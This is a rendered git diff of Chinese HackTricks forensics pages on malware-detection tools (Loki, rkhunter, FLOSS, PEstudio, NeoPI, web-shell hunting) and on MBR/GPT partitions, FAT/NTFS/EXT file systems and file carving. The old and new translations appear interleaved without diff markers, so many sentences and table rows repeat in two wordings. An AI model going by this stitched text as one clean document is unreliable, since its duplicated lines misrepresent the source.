[**Github仓库**](https://github.com/mandiant/capa)中获取它。
[**Github 仓库**](https://github.com/mandiant/capa) 获取它。
### IOC(指标泄露)
### IOCs
IOC代表指标泄露。IOC是一组条件用于识别一些潜在的不受欢迎的软件或已确认的恶意软件。蓝队使用这种定义来在其系统和网络中搜索此类恶意文件。\
共享这些定义非常有用因为当在计算机中识别出恶意软件并创建了该恶意软件的IOC时其他蓝队可以使用它来更快地识别出该恶意软件。
IOC 指的是妥协指标。IOC 是一组**条件,用于识别**一些可能不受欢迎的软件或已确认的**恶意软件**。蓝队使用这种定义来**在他们的**系统**和**网络**中搜索这类恶意文件**。\
分享这些定义非常有用,因为当在计算机中识别出恶意软件并为该恶意软件创建了 IOC 后,其他蓝队可以使用它来更快地识别恶意软件。
创建或修改IOC的工具是[**IOC Editor**](https://www.fireeye.com/services/freeware/ioc-editor.html)**。**\
您可以使用诸如[**Redline**](https://www.fireeye.com/services/freeware/redline.html)的工具在设备中搜索定义的IOC
创建或修改 IOCs 的工具是 [**IOC 编辑器**](https://www.fireeye.com/services/freeware/ioc-editor.html)**。**\
您可以使用 [**Redline**](https://www.fireeye.com/services/freeware/redline.html) 等工具**在设备中搜索定义的 IOCs**
### Loki
[**Loki**](https://github.com/Neo23x0/Loki)是一个用于简单指标泄露的扫描器。\
[**Loki**](https://github.com/Neo23x0/Loki) 是一个简单妥协指标的扫描器。\
检测基于四种检测方法:
```
1. File Name IOC
@ -226,43 +102,43 @@ Compares known malicious hashes (MD5, SHA1, SHA256) with scanned files
4. C2 Back Connect Check
Compares process connection endpoints with C2 IOCs (new since version v.10)
```
### Linux 恶意软件检测
### Linux Malware Detect
[**Linux 恶意软件检测 (LMD)**](https://www.rfxn.com/projects/linux-malware-detect/) 是一个针对 Linux 的恶意软件扫描器,采用 GNU GPLv2 许可证发布,旨在解决共享托管环境中面临的威胁。它利用网络边缘入侵检测系统的威胁数据来提取正在攻击中使用的恶意软件,并生成用于检测的签名。此外,威胁数据还来自用户提交的 LMD 检查功能和恶意软件社区资源。
[**Linux Malware Detect (LMD)**](https://www.rfxn.com/projects/linux-malware-detect/) 是一款在 GNU GPLv2 许可下发布的 Linux 恶意软件扫描器,专为共享托管环境中面临的威胁而设计。它使用来自网络边缘入侵检测系统的威胁数据来提取正在攻击中积极使用的恶意软件,并生成用于检测的签名。此外,威胁数据还来自用户通过 LMD 结账功能的提交以及恶意软件社区资源。
### rkhunter
可以使用类似 [**rkhunter**](http://rkhunter.sourceforge.net) 的工具来检查文件系统中可能存在的 **rootkit** 和恶意软件。
[**rkhunter**](http://rkhunter.sourceforge.net) 这样的工具可以用来检查文件系统中可能存在的 **rootkits** 和恶意软件。
```bash
sudo ./rkhunter --check -r / -l /tmp/rkhunter.log [--report-warnings-only] [--skip-keypress]
```
### FLOSS
[FLOSS](https://github.com/mandiant/flare-floss)是一种工具,它将尝试使用不同的技术在可执行文件中查找混淆的字符串。
[**FLOSS**](https://github.com/mandiant/flare-floss) 是一个工具,它会尝试使用不同技术在可执行文件中找到混淆的字符串。
### PEpper
[PEpper](https://github.com/Th3Hurrican3/PEpper)检查可执行文件中的一些基本内容二进制数据、熵、URL和IP地址一些yara规则
[PEpper](https://github.com/Th3Hurrican3/PEpper) 检查可执行文件内的一些基本内容二进制数据、熵、URL和IP一些yara规则
### PEstudio
[PEstudio](https://www.winitor.com/download)是一种工具可以获取Windows可执行文件的信息如导入、导出、头部还会检查病毒总和并找到潜在的Att\&ck技术。
[PEstudio](https://www.winitor.com/download) 是一个工具允许获取Windows可执行文件的信息如导入、导出、头文件同时也会检查病毒总数并找到潜在的攻击技术。
### Detect It Easy(DiE)
[DiE](https://github.com/horsicq/Detect-It-Easy/)是一种工具,用于检测文件是否被加密,并找到打包程序
[**DiE**](https://github.com/horsicq/Detect-It-Easy/) 是一个工具,用于检测文件是否被**加密**,同时也能找到**打包器**
### NeoPI
[NeoPI](https://github.com/CiscoCXSecurity/NeoPI)是一个使用各种统计方法来检测文本/脚本文件中的混淆和加密内容的Python脚本。NeoPI的预期目的是帮助检测隐藏的Web Shell代码
[**NeoPI**](https://github.com/CiscoCXSecurity/NeoPI) 是一个Python脚本使用各种**统计方法**来检测文本/脚本文件中的**混淆**和**加密**内容。NeoPI的目的是帮助**检测隐藏的web shell代码**
### php-malware-finder
### **php-malware-finder**
[PHP-malware-finder](https://github.com/nbs-system/php-malware-finder)尽其所能检测混淆/可疑代码,以及使用在恶意软件/ Web Shell中经常使用的PHP函数的文件
[**PHP-malware-finder**](https://github.com/nbs-system/php-malware-finder) 尽其所能检测**混淆**/**可疑代码**,以及使用**PHP**函数的文件,这些函数经常在**恶意软件**/webshells中使用
### Apple二进制签名
### Apple Binary Signatures
在检查一些恶意软件样本时,您应该始终检查二进制文件的签名,因为签名它的开发者可能已经与恶意软件有关。
在检查某些**恶意软件样本**时,你应该始终**检查二进制文件的签名**,因为签名它的**开发者**可能已经与**恶意软件**有关。
```bash
#Get signer
codesign -vv -d /bin/ls 2>&1 | grep -E "Authority|TeamIdentifier"
@ -277,24 +153,26 @@ spctl --assess --verbose /Applications/Safari.app
### 文件堆叠
如果你知道一个包含网页服务器**文件**的文件夹在**某个日期**之后**最后更新**过。**检查**网页服务器上所有**文件**的创建和修改**日期**,如果有任何**可疑**日期,检查该文件。
如果您知道某个包含**文件**的文件夹是在**某个日期**上次更新的。**检查**该**日期**所有**文件**在**网页服务器上创建和修改的日期**,如果有任何日期**可疑**,检查该文件。
### 基线
### 基线
如果一个文件夹的文件**不应该被修改**,你可以计算文件夹中**原始文件**的**哈希值**,并与**当前文件**进行**比较**。任何被修改的文件都是**可疑**的
如果文件夹的文件**不应该被修改**,您可以计算文件夹**原始文件**的**哈希值**并将它们与**当前**文件进行**比较**。任何被修改的都将是**可疑的**
### 统计分析
当信息保存在日志中时,你可以**检查统计数据**,比如一个网页服务器的每个文件被访问的次数,因为其中可能有一个**Web shell**。
当信息被保存在日志中时,您可以**检查统计数据,比如每个文件被访问的次数,因为网页外壳可能是其中之一**。
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>从零开始学习AWS黑客攻击直到成为专家通过</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS 红队专家)</strong></a><strong></strong></summary>
* 你在一家**网络安全公司**工作吗你想在HackTricks中看到你的**公司广告**吗?或者你想获得**PEASS的最新版本或下载PDF格式的HackTricks**吗?请查看[**订阅计划**](https://github.com/sponsors/carlospolop)
* 发现我们的独家[NFT](https://opensea.io/collection/the-peass-family)收藏品[**The PEASS Family**](https://opensea.io/collection/the-peass-family)
* 获得[**官方PEASS和HackTricks周边产品**](https://peass.creator-spring.com)
* **加入**[**💬**](https://emojipedia.org/speech-balloon/) [**Discord群组**](https://discord.gg/hRep4RUj7f)或[**电报群组**](https://t.me/peass),或者**关注**我在**Twitter**上的[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* **通过向**[**hacktricks repo**](https://github.com/carlospolop/hacktricks) **和**[**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **提交PR来分享你的黑客技巧。**
其他支持HackTricks的方式
* 如果您想在**HackTricks中看到您的公司广告**或**下载HackTricks的PDF版本**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)
* 获取[**官方PEASS & HackTricks商品**](https://peass.creator-spring.com)
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs系列**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram群组**](https://t.me/peass) 或在**Twitter** 🐦 上**关注**我 [**@carlospolopm**](https://twitter.com/carlospolopm)**。**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来**分享您的黑客技巧**。
</details>

223
forensics/basic-forensic-methodology/partitions-file-systems-carving/README.md
View file

@ -1,67 +1,69 @@
# 分区/文件系统/数据恢复
# 分区/文件系统/数据挖掘
## 分区/文件系统/数据恢复
## 分区/文件系统/数据挖掘
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks 云 ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 推特 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 YouTube 🎥</strong></a></summary>
<summary><strong>从零开始学习AWS黑客技术成为</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS红队专家)</strong></a><strong></strong></summary>
* 你在一家**网络安全公司**工作吗?你想在 HackTricks 中看到你的**公司广告**吗?或者你想获得**PEASS的最新版本或下载PDF格式的HackTricks**吗?请查看[**订阅计划**](https://github.com/sponsors/carlospolop)
* 发现我们的独家[NFT收藏品**The PEASS Family**](https://opensea.io/collection/the-peass-family)
* 获取[**官方PEASS和HackTricks周边产品**](https://peass.creator-spring.com)
* **加入**[**💬**](https://emojipedia.org/speech-balloon/) [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram群组**](https://t.me/peass) 或 **关注**我在**Twitter**上的[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* **通过向**[**hacktricks repo**](https://github.com/carlospolop/hacktricks) **和**[**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **提交PR来分享你的黑客技巧。**
支持HackTricks的其他方式
* 如果您想在**HackTricks中看到您的公司广告**或**下载HackTricks的PDF**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)
* 获取[**官方PEASS & HackTricks商品**](https://peass.creator-spring.com)
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs系列**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram群组**](https://t.me/peass) 或在**Twitter** 🐦 上**关注**我 [**@carlospolopm**](https://twitter.com/carlospolopm)**。**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。**
</details>
## 分区
硬盘或**SSD磁盘可以包含不同的分区**,目的是物理上分隔数据。\
磁盘的**最小**单位是**扇区**通常由512B组成。因此每个分区的大小需要是该大小的倍数。
磁盘的**最小**单位是**扇区**通常由512B组成。因此每个分区的大小需要是该大小的倍数。
### MBR主引导记录
分配在**引导代码的446B之后的磁盘的第一个扇区**中。该扇区对于指示计算机应该从何处挂载分区至关重要。\
它最多允许**4个分区**(最多**只能有1个**活动/可引导)。但是,如果需要更多的分区,可以使用**扩展分区**。该第一个扇区的最后一个字节是引导记录签名**0x55AA**。只能标记一个分区为活动状态。\
MBR允许**最大2.2TB**。
位于磁盘的**第一个扇区引导代码的446B之后**。这个扇区对于指示PC应该从哪里挂载什么分区至关重要。\
它最多允许**4个分区**(最多**只有1个**可以是活动的/**可引导的**)。然而,如果您需要更多分区,您可以使用**扩展分区**。这个第一个扇区的**最后一个字节**是引导记录签名**0x55AA**。只有一个分区可以被标记为活动的。\
MBR允许**最大容量为2.2TB**。
![](<../../../.gitbook/assets/image (489).png>)
![](<../../../.gitbook/assets/image (490).png>)
从MBR的**440到443字节**,可以找到**Windows磁盘签名**如果使用Windows。硬盘的逻辑驱动器字母取决于Windows磁盘签名。更改此签名可能会导致Windows无法启动工具[**Active Disk Editor**](https://www.disk-editor.org/index.html)****。
从MBR的**440到443字节**可以找到**Windows磁盘签名**如果使用Windows。硬盘的逻辑驱动器字母取决于Windows磁盘签名。更改此签名可能会阻止Windows启动工具[**Active Disk Editor**](https://www.disk-editor.org/index.html)**)**。
![](<../../../.gitbook/assets/image (493).png>)
**格式**
| 偏移量 | 长度 | 项目 |
| 偏移量 | 长度 | 项目 |
| ----------- | ---------- | ------------------- |
| 0 (0x00) | 446(0x1BE) | 引导代码 |
| 446 (0x1BE) | 16 (0x10) | 第一分区 |
| 462 (0x1CE) | 16 (0x10) | 第二分区 |
| 478 (0x1DE) | 16 (0x10) | 第三分区 |
| 494 (0x1EE) | 16 (0x10) | 第四分区 |
| 510 (0x1FE) | 2 (0x2) | 签名 0x55 0xAA |
| 446 (0x1BE) | 16 (0x10) | 第一分区 |
| 462 (0x1CE) | 16 (0x10) | 第二分区 |
| 478 (0x1DE) | 16 (0x10) | 第三分区 |
| 494 (0x1EE) | 16 (0x10) | 第四分区 |
| 510 (0x1FE) | 2 (0x2) | 签名 0x55 0xAA |
**分区记录格式**
| 偏移量 | 长度 | 项目 |
| 偏移量 | 长度 | 项目 |
| --------- | -------- | ------------------------------------------------------ |
| 0 (0x00) | 1 (0x01) | 活动标志0x80 = 可引导) |
| 1 (0x01) | 1 (0x01) | 起始头 |
| 2 (0x02) | 1 (0x01) | 起始扇区位0-5柱面的高位6-7 |
| 3 (0x03) | 1 (0x01) | 起始柱面的最低8位 |
| 4 (0x04) | 1 (0x01) | 分区类型代码0x83 = Linux |
| 5 (0x05) | 1 (0x01) | 结束头 |
| 6 (0x06) | 1 (0x01) | 结束扇区位0-5柱面的高位6-7 |
| 7 (0x07) | 1 (0x01) | 结束柱面的最低8位 |
| 8 (0x08) | 4 (0x04) | 分区之前的扇区数(小端) |
| 12 (0x0C) | 4 (0x04) | 分区中的扇区数 |
| 0 (0x00) | 1 (0x01) | 活动标志 (0x80 = 可引导) |
| 1 (0x01) | 1 (0x01) | 起始头 |
| 2 (0x02) | 1 (0x01) | 起始扇区 (位0-5); 圆柱体上位 (6- 7) |
| 3 (0x03) | 1 (0x01) | 起始圆柱体最低8位 |
| 4 (0x04) | 1 (0x01) | 分区类型代码 (0x83 = Linux) |
| 5 (0x05) | 1 (0x01) | 结束头 |
| 6 (0x06) | 1 (0x01) | 结束扇区 (位0-5); 圆柱体上位 (6- 7) |
| 7 (0x07) | 1 (0x01) | 结束圆柱体最低8位 |
| 8 (0x08) | 4 (0x04) | 分区前扇区数 (小端序) |
| 12 (0x0C) | 4 (0x04) | 分区内扇区数 |
在Linux中挂载MBR首先需要获取起始偏移量可以使用`fdisk`和`p`命令)
为了在Linux中挂载MBR首先需要获取起始偏移量可以使用`fdisk`和`p`命令)
![](<../../../.gitbook/assets/image (413) (3) (3) (3) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (12).png>)
![](<../../../.gitbook/assets/image (413) (3) (3) (3) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (12).png>)
然后使用以下代码
```bash
@ -70,82 +72,83 @@ mount -o ro,loop,offset=<Bytes>
#63x512 = 32256Bytes
mount -o ro,loop,offset=32256,noatime /path/to/image.dd /media/part/
```
**LBA(逻辑块寻址)**
**LBA (逻辑块寻址)**
**逻辑块寻址**LBA是一种常用的方案用于指定存储在计算机存储设备上的数据块的位置通常是二级存储系统,如硬盘驱动器。LBA是一种特别简单的线性寻址方案块通过整数索引来定位第一个块为LBA 0第二个为LBA 1依此类推。
**逻辑块寻址****LBA**)是一种常用的方案,用于**指定存储在计算机存储设备上的数据块的位置**,通常是硬盘驱动器等二级存储系统。LBA是一种特别简单的线性寻址方案**块通过整数索引定位**第一个块是LBA 0第二个是LBA 1依此类推。
### GPTGUID分区表
### GPT (GUID 分区表)
它被称为GUID分区表因为驱动器上的每个分区都有一个全局唯一标识符
之所以称为GUID分区表是因为驱动器上的每个分区都有一个**全局唯一标识符**
就像MBR一样它从**扇区0**开始。MBR占用32位而GPT使用64位。\
GPT在Windows中允许最多128个分区容量高达**9.4ZB**。\
就像MBR一样它从**扇区0**开始。MBR占用32位**GPT**使用**64位**。\
GPT **允许在Windows中最多128个分区**,并支持高达**9.4ZB**。\
此外分区可以有一个36个字符的Unicode名称。
在MBR磁盘上分区和引导数据存储在一个地方。如果这些数据被覆盖或损坏,你就会遇到麻烦。相比之下,**GPT在磁盘上存储了多个副本**,因此它更加健壮,如果数据损坏,可以从磁盘上的其他位置尝试恢复损坏的数据
在MBR磁盘上分区和启动数据存储在一个位置。如果这些数据被覆盖或损坏,你就麻烦了。相比之下,**GPT在磁盘上多个位置存储这些数据的副本**因此它更加健壮并且如果数据损坏GPT可以注意到问题并**尝试从磁盘上的另一个位置恢复损坏的数据**
GPT还存储了循环冗余校验CRC以检查其数据是否完整。如果数据损坏GPT可以注意到问题并尝试从磁盘上的其他位置恢复损坏的数据
GPT还存储**循环冗余校验CRC**值以检查其数据是否完整。如果数据损坏GPT可以发现问题并**尝试从磁盘上的另一个位置恢复损坏的数据**
**保护性MBRLBA0**
**保护性MBR (LBA0)**
为了有限的向后兼容性GPT规范中仍然保留了传统MBR的空间但现在以一种**方式使用**以防止基于MBR的磁盘工具错误识别和可能覆盖GPT磁盘。这被称为保护性MBR。
为了有限的向后兼容性GPT规范中仍保留了传统MBR的空间但现在的使用方式是为了**防止基于MBR的磁盘工具错误识别并可能覆盖GPT磁盘**。这被称为保护性MBR。
![](<../../../.gitbook/assets/image (491).png>)
**混合MBRLBA 0 + GPT**
**混合MBR (LBA 0 + GPT)**
在支持通过BIOS进行基于GPT的引导而不是EFI的操作系统中第一个扇区可能仍然用于存储第一阶段的引导加载程序代码但**修改**以识别GPT分区。MBR中的引导加载程序不能假设扇区大小为512字节。
在支持通过BIOS服务而不是EFI的**基于GPT的启动**的操作系统中,第一个扇区也可能仍用于存储**引导加载程序**代码的第一阶段,但**修改**为识别**GPT** **分区**。MBR中的引导加载程序不得假设扇区大小为512字节。
**分区表头LBA 1**
**分区表头 (LBA 1)**
分区表头定义了磁盘上可用的块。它还定义了成分区表的分区条目的数量和大小表中的偏移量80和84
分区表头定义了磁盘上可用的块。它还定义了成分区表的分区条目的数量和大小表中的偏移量80和84
| 偏移量 | 长度 | 内容 |
| --------- | -------- | ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| 0 (0x00) | 8字节 | 签名("EFI PART"45h 46h 49h 20h 50h 41h 52h 54h或0x5452415020494645ULL[ ](https://en.wikipedia.org/wiki/GUID\_Partition\_Table#cite\_note-8)在小端机器上) |
| 8 (0x08) | 4字节 | UEFI 2.8的版本1.000h 00h 01h 00h |
| 12 (0x0C) | 4字节 | 头部大小(以字节为单位的小端序通常为5Ch 00h 00h 00h或92字节 |
| 16 (0x10) | 4字节 | 头部的CRC32偏移量+0到头部大小的小端序计算时该字段为零 |
| 20 (0x14) | 4字节 | 保留;必须为零 |
| 24 (0x18) | 8字节 | 当前LBA此头部副本的位置 |
| 32 (0x20) | 8字节 | 备份LBA另一个头部副本的位置 |
| 40 (0x28) | 8字节 | 分区的第一个可用LBA主分区表最后一个LBA + 1 |
| 48 (0x30) | 8字节 | 最后一个可用LBA次分区表的第一个LBA - 1 |
| 56 (0x38) | 16字节 | 混合字节序的磁盘GUID |
| 72 (0x48) | 8字节 | 分区条目数组的起始LBA主副本中始终为2 |
| 80 (0x50) | 4字节 | 数组中的分区条目数 |
| 84 (0x54) | 4字节 | 单个分区条目的大小通常为80h或128 |
| 88 (0x58) | 4字节 | 分区条目数组的CRC32的小端序 |
| 92 (0x5C) | \* | 保留;对于块的其余部分必须为零(对于512字节的扇区大小为420字节但对于更大的扇区大小可能更多 |
| 偏移量 | 长度 | 内容 |
| --------- | -------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| 0 (0x00) | 8 字节 | 签名("EFI PART", 45h 46h 49h 20h 50h 41h 52h 54h 或 0x5452415020494645ULL[ ](https://en.wikipedia.org/wiki/GUID\_Partition\_Table#cite\_note-8)在小端机器上) |
| 8 (0x08) | 4 字节 | 版本 1.0 (00h 00h 01h 00h) 适用于UEFI 2.8 |
| 12 (0x0C) | 4 字节 | 头部大小以小端表示以字节为单位通常为5Ch 00h 00h 00h 92字节 |
| 16 (0x10) | 4 字节 | 头部的[CRC32](https://en.wikipedia.org/wiki/CRC32)(从偏移量+0到头部大小以小端表示计算时此字段归零 |
| 20 (0x14) | 4 字节 | 保留;必须为零 |
| 24 (0x18) | 8 字节 | 当前LBA此头部副本的位置 |
| 32 (0x20) | 8 字节 | 备份LBA另一个头部副本的位置 |
| 40 (0x28) | 8 字节 | 分区的第一个可用LBA主分区表最后一个LBA + 1 |
| 48 (0x30) | 8 字节 | 最后一个可用LBA次级分区表第一个LBA 1 |
| 56 (0x38) | 16 字节 | 磁盘GUID以混合端表示 |
| 72 (0x48) | 8 字节 | 分区条目数组的起始LBA主副本中始终为2 |
| 80 (0x50) | 4 字节 | 数组中分区条目的数量 |
| 84 (0x54) | 4 字节 | 单个分区条目的大小通常为80h或128 |
| 88 (0x58) | 4 字节 | 分区条目数组的CRC32以小端表示 |
| 92 (0x5C) | \* | 保留;对于块的其余部分必须为零(对于扇区大小为512字节的为420字节但对于更大的扇区大小可以更多 |
**分区条目LBA 233**
**分区条目 (LBA 233)**
| GUID分区条目格式 | | |
| ---------------- | -------- | ----------------------------------------------------------------------------------------------------------------- |
| 偏移量 | 长度 | 内容 |
| 0 (0x00) | 16字节 | [分区类型GUID](https://en.wikipedia.org/wiki/GUID\_Partition\_Table#Partition\_type\_GUIDs)(混合字节序) |
| 16 (0x10) | 16字节 | 唯一分区GUID混合字节序 |
| 32 (0x20) | 8字节 | 第一个LBA[小端序](https://en.wikipedia.org/wiki/Little\_endian) |
| 40 (0x28) | 8字节 | 最后一个LBA包括通常为奇数 |
| 48 (0x30) | 8字节 | 属性标志例如第60位表示只读 |
| 56 (0x38) | 72字节 | 分区名称36个[UTF-16](https://en.wikipedia.org/wiki/UTF-16)LE代码单元 |
| GUID分区条目格式 | | |
| --------------------------- | -------- | ----------------------------------------------------------------------------------------------------------------- |
| 偏移量 | 长度 | 内容 |
| 0 (0x00) | 16 字节 | [分区类型GUID](https://en.wikipedia.org/wiki/GUID\_Partition\_Table#Partition\_type\_GUIDs)(混合端表示) |
| 16 (0x10) | 16 字节 | 唯一分区GUID混合端表示 |
| 32 (0x20) | 8 字节 | 第一个LBA[小端表示](https://en.wikipedia.org/wiki/Little\_endian) |
| 40 (0x28) | 8 字节 | 最后一个LBA包含在内通常为奇数 |
| 48 (0x30) | 8 字节 | 属性标志例如第60位表示只读 |
| 56 (0x38) | 72 字节 | 分区名称36个[UTF-16](https://en.wikipedia.org/wiki/UTF-16)LE代码单元 |
**分区类型**
![](<../../../.gitbook/assets/image (492).png>)
更多分区类型请参考[https://en.wikipedia.org/wiki/GUID\_Partition\_Table](https://en.wikipedia.org/wiki/GUID\_Partition\_Table)
更多分区类型在 [https://en.wikipedia.org/wiki/GUID\_Partition\_Table](https://en.wikipedia.org/wiki/GUID\_Partition\_Table)
### 检查
在使用[**ArsenalImageMounter**](https://arsenalrecon.com/downloads/)挂载取证镜像后,可以使用Windows工具[**Active Disk Editor**](https://www.disk-editor.org/index.html)**检查第一个扇区**。在下图中,检测到了**MBR**在**扇区0**上,并进行了解释:
在使用[**ArsenalImageMounter**](https://arsenalrecon.com/downloads/)挂载取证映像后,您可以使用Windows工具[**Active Disk Editor**](https://www.disk-editor.org/index.html)**检查第一个扇区**。在下图中,检测到**MBR**位于**扇区0**并进行了解释:
![](<../../../.gitbook/assets/image (494).png>)
如果是**GPT表而不是MBR**,则在**扇区1**中应该出现_EFI PART_的签名在上图中为空
如果是**GPT表而不是MBR**,则应在**扇区1**出现签名_EFI PART_在上图中为空
## 文件系统
### Windows 文件系统列表
### Windows文件系统列表
* **FAT12/16**: MSDOS, WIN95/98/NT/200
* **FAT32**: 95/2000/XP/2003/VISTA/7/8/10
@ -155,27 +158,27 @@ GPT还存储了循环冗余校验CRC以检查其数据是否完整
### FAT
**FAT文件分配表**文件系统以其组织方法命名,文件分配表位于卷的开头。为了保护卷,**保留两个副本**的表,以防一个副本损坏。此外,文件分配表和根文件夹必须存储在**固定位置**,以便正确定位系统启动所需的文件。
**FAT文件分配表**文件系统以其组织方法命名,即文件分配表,位于卷的开头。为了保护卷,**两份**表的副本被保留,以防其中一份受损。此外,文件分配表和根文件夹必须存储在**固定位置**,以便正确定位启动系统所需的文件。
![](<../../../.gitbook/assets/image (495).png>)
该文件系统使用的最小空间单元是一个**簇通常为512B**(由多个扇区组成)。
此文件系统使用的最小空间单位是**簇通常为512B**(由多个扇区组成)。
早期的**FAT12**使用**12位簇地址**,最多有**4078个簇**它允许使用UNIX最多4084个簇。更高效的**FAT16**增加到**16位**簇地址,允许每个卷最多**65517个簇**。FAT32使用32位簇地址允许每个卷最多**268435456个簇**。
早期的**FAT12**将**簇地址限制为12位**值,最多可达**4078** **簇**在UNIX下允许最多4084个簇。更高效的**FAT16**增加到**16位**簇地址,允许每个卷最多**65,517个簇**。FAT32使用32位簇地址允许每个卷最多**268,435,456个簇**。
FAT允许的**最大文件大小为4GB**减去一个字节因为文件系统使用32位字段以字节为单位存储文件大小而2^32字节=4 GiB。这适用于FAT12、FAT16和FAT32。
**FAT允许的最大文件大小为4GB**减去一个字节因为文件系统使用32位字段以字节为单位存储文件大小而2^32字节=4GiB。这适用于FAT12、FAT16和FAT32。
**根目录**在FAT12和FAT16中占据**特定位置**在FAT32中它占据像任何其他文件夹一样的位置)。每个文件/文件夹条目包含以下信息:
**根目录**对于FAT12和FAT16占据**特定位置**在FAT32中它占据的位置像其他文件夹一样)。每个文件/文件夹条目包含以下信息:
* 文件/文件夹的名称最多8个字符
* 属性
* 创建日期
* 修改日期
* 最后访问日期
* 文件第一个簇所在的FAT表的地址
* FAT表中文件第一个簇的地址
* 大小
使用FAT文件系统“删除”文件时目录条目几乎保持**不变**,除了文件名的**第一个字符**修改为0xE5保留了大部分“删除”文件的名称以及其时间戳、文件长度和最重要的是磁盘上的物理位置。然而文件占用的磁盘簇列表将从文件分配表中删除将这些扇区标记为其他文件创建或修改后可用。在FAT32的情况下还会擦除一个负责文件起始簇值的上16位的擦除字段
使用FAT文件系统“删除”文件时目录条目除了**文件名的第一个字符**修改为0xE5几乎保持**不变**,保留了大部分“已删除”文件的名称、时间戳、文件长度和 — 最重要的 — 其在磁盘上的物理位置。然而文件占用的磁盘簇列表将从文件分配表中擦除标记这些扇区可供以后创建或修改的其他文件使用。对于FAT32还有一个负责文件起始簇值上16位的字段被擦除
### **NTFS**
@ -185,7 +188,7 @@ FAT允许的**最大文件大小为4GB**(减去一个字节),因为文件
### EXT
**Ext2**是**不带日志**的分区(**不经常更改的分区**,如引导分区)上最常见的文件系统。**Ext3/4**是**带日志**的文件系统,通常用于**其余分区**。
**Ext2**是最常见的**非日志文件系统****不经常变化的分区**,如启动分区)。**Ext3/4**是**日志文件系统**,通常用于**其余分区**。
{% content-ref url="ext.md" %}
[ext.md](ext.md)
@ -193,45 +196,46 @@ FAT允许的**最大文件大小为4GB**(减去一个字节),因为文件
## **元数据**
某些文件包含元数据。这些信息是关于文件内容的,对于分析人员来说可能很有趣,因为根据文件类型的不同,它可能包含以下信息
一些文件包含元数据。这些信息是关于文件内容的,有时对分析师来说可能很有趣,因为根据文件类型,它可能包含像
* 标题
* 使用的 MS Office 版本
* 使用的MS Office版本
* 作者
* 创建和最后修改日期
* 创建和最后修改日期
* 相机型号
* GPS 坐标
* GPS坐标
* 图像信息
您可以使用[**exiftool**](https://exiftool.org)和[**Metadiver**](https://www.easymetadata.com/metadiver-2/)工具获取文件的元数据。
您可以使用[**exiftool**](https://exiftool.org)和[**Metadiver**](https://www.easymetadata.com/metadiver-2/)这样的工具获取文件的元数据。
## **已删除文件恢复**
### 记录已删除文件
### 记录已删除文件
如前所述,文件“删除”后仍然保存在多个位置。这是因为通常从文件系统中删除文件只是将其标记为已删除但数据并未被触及。然后可以检查文件的注册表如MFT找到已删除的文件。
如前所述,通常文件从文件系统中被“删除”后,文件的记录仍然保存在原处。这是因为通常删除文件只是将其标记为已删除但数据并未被触及。然后可以检查文件的注册表如MFT找到已删除的文件。
此外,操作系统通常保存有关文件系统更改和备份的大量信息,因此可以尝试使用它们来恢复文件或尽可能多的信息。
此外,操作系统通常会保存大量关于文件系统更改和备份的信息,因此可以尝试使用它们来恢复文件或尽可能多的信息。
{% content-ref url="file-data-carving-recovery-tools.md" %}
[file-data-carving-recovery-tools.md](file-data-carving-recovery-tools.md)
{% endcontent-ref %}
### **文件切割**
### **文件雕刻**
**文件切割**是一种试图在大量数据中找到文件的技术。这类工具的工作方式有三种:基于文件类型的头部和尾部,基于文件类型的结构,以及基于内容本身。
**文件雕刻**是一种尝试**在大量数据中找到文件的技术**。这类工具的工作方式有3种主要方法**基于文件类型的头部和尾部**,基于文件类型的**结构**,以及基于**内容**本身。
